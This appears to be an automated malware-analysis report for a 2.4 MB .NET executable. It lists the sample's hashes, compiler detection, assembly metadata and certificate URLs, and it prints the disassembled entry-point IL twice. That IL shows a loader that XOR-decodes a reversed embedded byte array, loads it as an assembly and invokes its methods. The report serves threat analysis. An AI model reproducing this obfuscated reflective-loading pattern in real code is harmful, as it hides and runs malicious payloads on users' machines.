7ffb3572cf07c5c9d51bd934b56b0ab2

PE Executable
|
MD5: 7ffb3572cf07c5c9d51bd934b56b0ab2
|
Size: 2.4 MB
|
application/x-dosexec

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	7ffb3572cf07c5c9d51bd934b56b0ab2
Sha1	cf7009f69eb3eb06961740b05ea3a55b5dc39fff
Sha256	7eb16b0b45dab6d07f6b00b20923751acc5313db25c978ee5f5c42317479af3b
Sha384	fdcc6f9d787910b8264e134c54c63da9b103da9bc6c715488385375eb7172efc7f0cd40673dd8c939ab68184d26a4e98
Sha512	e797a6ee668c0db4be03a21bb1f15fbf30ddef2a5607553e2babd5aafe29300ed0b45138c7b5cd8d7a3fd31f64930cb80d7d222244088a3e91c4290e3b466c14
SSDeep	49152:rPXSJg0byG/maCcSat+orzCpDt+w1x+VqVj:rPXsg0bSrczt+orOoVqJ
TLSH	B4B501223F9E2944C77AAF349DB7E6384BB25E4ADD29D35BA895304CAD3374913E0701

PeID

.NET executable

Microsoft Visual C# / Basic .NET

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

Microsoft Visual C# v7.0 / Basic .NET

Microsoft Visual Studio .NET

File Structure

Informations

Name0	Value
Info	PE Detect: PeReader OK (file layout)
Info	Authenticode present at 0x246600 size 18264 bytes
Module Name	Ycj8j
Full Name	Ycj8j
EntryPoint	System.Void Ycj8j.2KmzLba7ox4AcM::3PobCar8()
Scope Name	Ycj8j
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	Ycj8j
Assembly Version	1.9.2.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	.NETFramework,Version=v4.6
Total Strings	981
Main Method	System.Void Ycj8j.2KmzLba7ox4AcM::3PobCar8()
Main IL Instruction Count	125
Main IL	nop <null> nop <null> ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Byte[] Ycj8j.8eqJfD6a0wcQY2::9HtiBsj7() call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) stloc.0 <null> ldloc.0 <null> ldlen <null> conv.i4 <null> ldc.i4.1 <null> sub.ovf <null> stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 br.s IL_0049: ldloc.s V_5 ldloc.s V_5 ldc.i4.8 <null> rem <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brfalse.s IL_0042: nop ldloc.0 <null> ldloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldelem.u1 <null> ldc.i4 211 xor <null> stelem.i1 <null> nop <null> nop <null> ldloc.s V_5 ldc.i4.1 <null> add.ovf <null> stloc.s V_5 ldloc.s V_5 ldloc.s V_4 ble.s IL_0026: ldloc.s V_5 ldloc.0 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.1 <null> ldloc.1 <null> callvirt System.Type[] System.Reflection.Assembly::GetTypes() stloc.2 <null> ldloc.2 <null> ldlen <null> conv.i4 <null> ldc.i4.s 24 cgt <null> ldc.i4.0 <null> ceq <null> stloc.s V_7 ldloc.s V_7 brfalse.s IL_006F: ldloc.2 leave.s IL_00EA: ret ldloc.2 <null> ldc.i4.s 24 ldelem.ref <null> stloc.3 <null> ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_8 ldloc.s V_8 brfalse.s IL_0080: ldloc.3 leave.s IL_00EA: ret ldloc.3 <null> ldc.i4.s 56 callvirt System.Reflection.MethodInfo[] System.Type::GetMethods(System.Reflection.BindingFlags) stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_00CC: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters() ldlen <null> conv.i4 <null> ldc.i4.0 <null> ceq <null> stloc.s V_12 ldloc.s V_12 brfalse.s IL_00C4: nop nop <null> ldloc.s V_11 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_00C2: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00C2: nop nop <null> nop <null> nop <null> nop <null> ldloc.s V_10 ldc.i4.1 <null> add.ovf <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> clt <null> stloc.s V_13 ldloc.s V_13 brtrue.s IL_008F: ldloc.s V_9 leave.s IL_00E9: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00E9: nop nop <null> ret <null>
Module Name	Ycj8j
Full Name	Ycj8j
EntryPoint	System.Void Ycj8j.2KmzLba7ox4AcM::3PobCar8()
Scope Name	Ycj8j
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	Ycj8j
Assembly Version	1.9.2.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	.NETFramework,Version=v4.6
Total Strings	981
Main Method	System.Void Ycj8j.2KmzLba7ox4AcM::3PobCar8()
Main IL Instruction Count	125
Main IL	nop <null> nop <null> ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Byte[] Ycj8j.8eqJfD6a0wcQY2::9HtiBsj7() call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) stloc.0 <null> ldloc.0 <null> ldlen <null> conv.i4 <null> ldc.i4.1 <null> sub.ovf <null> stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 br.s IL_0049: ldloc.s V_5 ldloc.s V_5 ldc.i4.8 <null> rem <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brfalse.s IL_0042: nop ldloc.0 <null> ldloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldelem.u1 <null> ldc.i4 211 xor <null> stelem.i1 <null> nop <null> nop <null> ldloc.s V_5 ldc.i4.1 <null> add.ovf <null> stloc.s V_5 ldloc.s V_5 ldloc.s V_4 ble.s IL_0026: ldloc.s V_5 ldloc.0 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.1 <null> ldloc.1 <null> callvirt System.Type[] System.Reflection.Assembly::GetTypes() stloc.2 <null> ldloc.2 <null> ldlen <null> conv.i4 <null> ldc.i4.s 24 cgt <null> ldc.i4.0 <null> ceq <null> stloc.s V_7 ldloc.s V_7 brfalse.s IL_006F: ldloc.2 leave.s IL_00EA: ret ldloc.2 <null> ldc.i4.s 24 ldelem.ref <null> stloc.3 <null> ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_8 ldloc.s V_8 brfalse.s IL_0080: ldloc.3 leave.s IL_00EA: ret ldloc.3 <null> ldc.i4.s 56 callvirt System.Reflection.MethodInfo[] System.Type::GetMethods(System.Reflection.BindingFlags) stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_00CC: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters() ldlen <null> conv.i4 <null> ldc.i4.0 <null> ceq <null> stloc.s V_12 ldloc.s V_12 brfalse.s IL_00C4: nop nop <null> ldloc.s V_11 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_00C2: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00C2: nop nop <null> nop <null> nop <null> nop <null> ldloc.s V_10 ldc.i4.1 <null> add.ovf <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> clt <null> stloc.s V_13 ldloc.s V_13 brtrue.s IL_008F: ldloc.s V_9 leave.s IL_00E9: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00E9: nop nop <null> ret <null>

Artefacts

Name0	Value
URLs in VB Code - #1	https://certs.securetrust.com/CA0
URLs in VB Code - #2	http://crl.securetrust.com/TWGCSCA_L1.crl0y
URLs in VB Code - #3	http://ocsp.securetrust.com/0
URLs in VB Code - #4	http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
URLs in VB Code - #5	https://ssl.trustwave.com/CA03
URLs in VB Code - #6	http://crl.trustwave.com/TWGCA.crl0n
URLs in VB Code - #7	http://ocsp.trustwave.com/06
URLs in VB Code - #8	http://ssl.trustwave.com/issuers/TWGCA.crt0
URLs in VB Code - #9	http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
URLs in VB Code - #10	http://ocsp.vikingcloud.com/0A
URLs in VB Code - #11	http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
URLs in VB Code - #12	https://certs.securetrust.com/CA05
URLs in VB Code - #13	http://crl.vikingcloud.com/TWGCA.crl0t
URLs in VB Code - #14	http://ocsp.vikingcloud.com/0
URLs in VB Code - #15	http://certs.securetrust.com/issuers/TWGCA.crt0

7ffb3572cf07c5c9d51bd934b56b0ab2 (2.4 MB)

7ffb3572cf07c5c9d51bd934b56b0ab2

PE Executable | MD5: 7ffb3572cf07c5c9d51bd934b56b0ab2 | Size: 2.4 MB | application/x-dosexec

PE Executable
|
MD5: 7ffb3572cf07c5c9d51bd934b56b0ab2
|
Size: 2.4 MB
|
application/x-dosexec